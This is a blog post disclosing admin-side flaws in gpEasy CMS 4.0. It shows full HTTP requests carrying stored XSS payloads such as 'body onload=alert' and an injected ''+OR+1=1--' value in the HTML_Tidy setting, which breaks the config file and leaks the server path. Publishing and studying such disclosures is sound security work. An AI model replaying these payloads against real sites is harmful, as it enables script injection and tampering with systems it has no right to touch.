Hi,
there is a new release of gpEasy CMS. This release has number 4.0.
I decide to post it here too.
Of course all vulnerable parts of this CMS are located in part dedicated to logged-in admin,
so maybe you should consider it as a low-level vulnerabilities (... csrf? ;) ).
Anyway, maybe few of you will find it interesting.
I should mention here, that gpEasy Team is developing better and better filters,
so we will see what they'll do in next version.
Here we go:
First one detailed below is XSS vulnerability.
Simple <script> tag is filtered out. Anyway this can be cheated like that:
---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area
---request---
and we will see at the response sourcecode that our payload was added correctly:
---response---
(...)
>Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaa
aa</td><td><h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbb
bbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td>
<td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/
(...)
---response---
similar situation in other place:
---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
cmd=new_section&file=aaaaaaaaaaaa&type='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area
---request---
Response will be similar.
Another situation when we have a little vuln is described below.
Durning some tests I found that gpEasy is presenting full path do wwwroot.
Check it out:
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache
title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy='%2bOR%2b1%3d1--&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&resize_images=false&resize_images=true&toemail=admin%40here.com&toname=&from_address=AutomatedSender%40192.168.1.101&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config&verified=95027f35b0&verified=95027f35b0&aaa=Save
Response for this one looks like this:
---response---
HTTP/1.0 500 Internal Server Error
Date: Fri, 24 May 2013 18:07:02 GMT
(...)
Content-Type: text/html; charset=utf-8
<p>Oops, an error occurred while generating this page.<p><h3>Error Details</h3><pre>array(
[type] => (integer)4
[message] => (string)syntax error, unexpected ''in' (T_ENCAPSED_AND_WHITESPACE)
[file] => (string)/home/kuba/public_html/gpEasy4.0/gpEasy/data/_site/config.php
[line] => (integer)92
[request] => (string)/kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905
[time] => (integer)1369418822
[request_method] => (string)POST
[file_modified] => (integer)1369418822
[file_size] => (integer)3082
)</pre><p><a href="">Reload this page</a></p><p style="font-size:90%">Note: Error details are only displayed for logged in administrators</p>
---response---
HTML_TidypParameter is vulnerable, but if you want - you should test it again by yourself,
because I think it could be similar bug to that one I found in Drupal:
if you will send 'too much requests' to webapp, it will simple crash it (and error will be presented).
Thanks to gpEasy Team for a fast reply. Good job!
Cheers o/
No comments:
Post a Comment
What do You think...?